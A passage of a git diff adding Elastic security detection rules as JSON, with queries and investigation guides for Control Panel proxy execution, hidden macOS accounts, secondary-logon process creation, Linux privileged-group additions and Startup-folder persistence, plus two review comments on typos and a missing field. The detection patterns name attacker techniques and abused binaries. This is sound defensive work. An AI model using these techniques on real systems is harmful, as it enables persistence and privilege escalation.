"^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "41284ba3-ed1a-4598-bfba-a97f75d9aba2", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Rule Type: BBR", + 
"Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1559", + "name": "Inter-Process Communication", + "reference": "https://attack.mitre.org/techniques/T1559/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "41284ba3-ed1a-4598-bfba-a97f75d9aba2_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_110.json b/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_110.json new file mode 100644 index 00000000000..105c0f9f3c9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_110.json 
@@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies unusual instances of Control Panel with suspicious keywords or paths in the process command line value. Adversaries may abuse control.exe to proxy execution of malicious code.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Control Panel Process with Unusual Arguments", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.executable : (\"?:\\\\Windows\\\\SysWOW64\\\\control.exe\", \"?:\\\\Windows\\\\System32\\\\control.exe\") and\n process.command_line :\n (\"*.jpg*\",\n \"*.png*\",\n \"*.gif*\",\n \"*.bmp*\",\n \"*.jpeg*\",\n \"*.TIFF*\",\n \"*.inf*\",\n \"*.cpl:*/*\",\n \"*../../..*\",\n \"*/AppData/Local/*\",\n \"*:\\\\Users\\\\Public\\\\*\",\n \"*\\\\AppData\\\\Local\\\\*\")\n", + "references": [ + "https://www.joesandbox.com/analysis/476188/1/html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "416697ae-e468-4093-a93d-59661fa619ec", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to 
populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.002", + "name": "Control Panel", + "reference": "https://attack.mitre.org/techniques/T1218/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "416697ae-e468-4093-a93d-59661fa619ec_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_111.json b/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_111.json new file mode 100644 index 00000000000..70825bf7810 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_111.json 
@@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies unusual instances of Control Panel with suspicious keywords or paths in the process command line value. Adversaries may abuse control.exe to proxy execution of malicious code.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Control Panel Process with Unusual Arguments", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.executable : (\"?:\\\\Windows\\\\SysWOW64\\\\control.exe\", \"?:\\\\Windows\\\\System32\\\\control.exe\") and\n process.command_line :\n (\"*.jpg*\",\n \"*.png*\",\n \"*.gif*\",\n \"*.bmp*\",\n \"*.jpeg*\",\n \"*.TIFF*\",\n \"*.inf*\",\n \"*.cpl:*/*\",\n \"*../../..*\",\n \"*/AppData/Local/*\",\n \"*:\\\\Users\\\\Public\\\\*\",\n \"*\\\\AppData\\\\Local\\\\*\")\n", + "references": [ + "https://www.joesandbox.com/analysis/476188/1/html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "416697ae-e468-4093-a93d-59661fa619ec", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to 
populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.002", + "name": "Control Panel", + "reference": "https://attack.mitre.org/techniques/T1218/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "416697ae-e468-4093-a93d-59661fa619ec_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_106.json b/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_106.json new file mode 100644 index 00000000000..714d671c8ef --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_106.json 
@@ -0,0 +1,92 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to create a local account that will be hidden from the macOS logon window. This may indicate an attempt to evade user attention while maintaining persistence using a separate local account.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Hidden Local User Account Creation", + "query": "event.category:process and host.os.type:macos and event.type:(start or process_started) and\n process.name:dscl and process.args:(IsHidden and create and (true or 1 or yes))\n", + "references": [ + "https://support.apple.com/en-us/HT203998" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "41b638a1-8ab6-4f8e-86d9-466317ef2db5", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.003", + "name": "Local Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "41b638a1-8ab6-4f8e-86d9-466317ef2db5_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_9.json b/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_9.json new file mode 100644 index 00000000000..c057e970864 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_9.json 
@@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies process creation with alternate credentials. Adversaries may create a new process with a different token to escalate privileges and bypass access controls.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Process Creation via Secondary Logon", + "query": "sequence by winlog.computer_name with maxspan=1m\n\n[authentication where event.action:\"logged-in\" and\n event.outcome == \"success\" and user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and\n\n /* seclogon service */\n process.name == \"svchost.exe\" and\n winlog.event_data.LogonProcessName : \"seclogo*\" and source.ip == \"::1\" ] by winlog.event_data.TargetLogonId\n\n[process where event.type == \"start\"] by winlog.event_data.TargetLogonId\n", + "references": [ + "https://attack.mitre.org/techniques/T1134/002/" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.computer_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.LogonProcessName", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetLogonId", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "42eeee3d-947f-46d3-a14d-7036b962c266", + "setup": "## Setup\n\nAudit events 4624 and 4688 are needed to trigger this rule.\n\nIf enabling 
an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/", + "subtechnique": [ + { + "id": "T1134.002", + "name": "Create Process with Token", + "reference": "https://attack.mitre.org/techniques/T1134/002/" + }, + { + "id": "T1134.003", + "name": "Make and Impersonate Token", + "reference": "https://attack.mitre.org/techniques/T1134/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 9 + }, + "id": "42eeee3d-947f-46d3-a14d-7036b962c266_9", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_6.json b/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_6.json new file mode 100644 index 00000000000..c2c07eb608b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_6.json 
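Review bot: This rule carries no `timestamp_override`, while every other EQL rule in this diff sets `"timestamp_override": "event.ingested"`, yet its own `setup` text tells users to populate `event.ingested` for the rule to work effectively. Either the override was dropped unintentionally for the `_9` revision, or the omission is deliberate for the `sequence by winlog.computer_name with maxspan=1m` query, in which case the `event.ingested` paragraph in `setup` describes a field the rule never reads and should be trimmed to the `Audit events 4624 and 4688 are needed to trigger this rule.` sentence. I cannot tell which from the hunk alone.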
@@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to add a user to a privileged group. Attackers may add users to a privileged group in order to establish persistence on a system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Linux User Added to Privileged Group", + "note": "## Triage and analysis\n\n### Investigating Linux User User Added to Privileged Group\n\nThe `usermod`, `adduser`, and `gpasswd` commands can be used to assign user accounts to new groups in Linux-based operating systems.\n\nAttackers may add users to a privileged group in order to escalate privileges or establish persistence on a system or domain.\n\nThis rule identifies the usages of `usermod`, `adduser` and `gpasswd` to assign user accounts to a privileged group.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the user was succesfully added to the privileged group.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Retrieve information about the privileged group to which the user was added.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Adding accounts to a group is a common administrative task, so there is a high chance of the activity being legitimate. 
Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the account that seems to be involved in malicious activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.args in (\n \"root\", \"admin\", \"wheel\", \"staff\", \"sudo\",\"disk\", \"video\", \"shadow\", \"lxc\", \"lxd\"\n) and\n(\n process.name in (\"usermod\", \"adduser\") or\n process.name == \"gpasswd\" and \n process.args in (\"-a\", \"--add\", \"-M\", \"--members\") \n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "43d6ec12-2b1c-47b5-8f35-e9de65551d3b", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1136", + "name": "Create Account", + "reference": "https://attack.mitre.org/techniques/T1136/", + "subtechnique": [ + { + "id": "T1136.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1136/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "43d6ec12-2b1c-47b5-8f35-e9de65551d3b_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_109.json b/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_109.json new file mode 100644 index 00000000000..98b600b4a5f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_109.json 
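Review bot: The `note` field's heading reads `### Investigating Linux User User Added to Privileged Group` (duplicated word) and its first investigation step says `succesfully`; these should be `### Investigating Linux User Added to Privileged Group` and `successfully`. The `setup` text also links `https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html`, pinned to 8.10, whereas the otherwise identical paragraph in the `41b638a1-8ab6-4f8e-86d9-466317ef2db5_106.json` file in this diff uses `https://www.elastic.co/guide/en/fleet/current/agent-policy.html`; the `current` form keeps the guide from going stale.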
@@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies files written to or modified in the startup folder by commonly abused processes. Adversaries may use this technique to maintain persistence.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Startup Persistence by a Suspicious Process", + "note": "## Triage and analysis\n\n### Investigating Startup Persistence by a Suspicious Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule monitors for commonly abused processes writing to the Startup folder locations.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators may add programs to this mechanism via command-line shells. Before the further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n user.domain != \"NT AUTHORITY\" and\n file.path : (\"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\*\") and\n process.name : (\"cmd.exe\",\n \"powershell.exe\",\n \"wmic.exe\",\n \"mshta.exe\",\n \"pwsh.exe\",\n \"cscript.exe\",\n \"wscript.exe\",\n \"regsvr32.exe\",\n \"RegAsm.exe\",\n \"rundll32.exe\",\n \"EQNEDT32.EXE\",\n \"WINWORD.EXE\",\n \"EXCEL.EXE\",\n \"POWERPNT.EXE\",\n \"MSPUB.EXE\",\n \"MSACCESS.EXE\",\n \"iexplore.exe\",\n \"InstallUtil.exe\")\n", + "references": [ + "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "440e2db4-bc7f-4c96-a068-65b78da59bde", + "setup": "## Setup\n\nIf enabling an EQL rule 
on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } 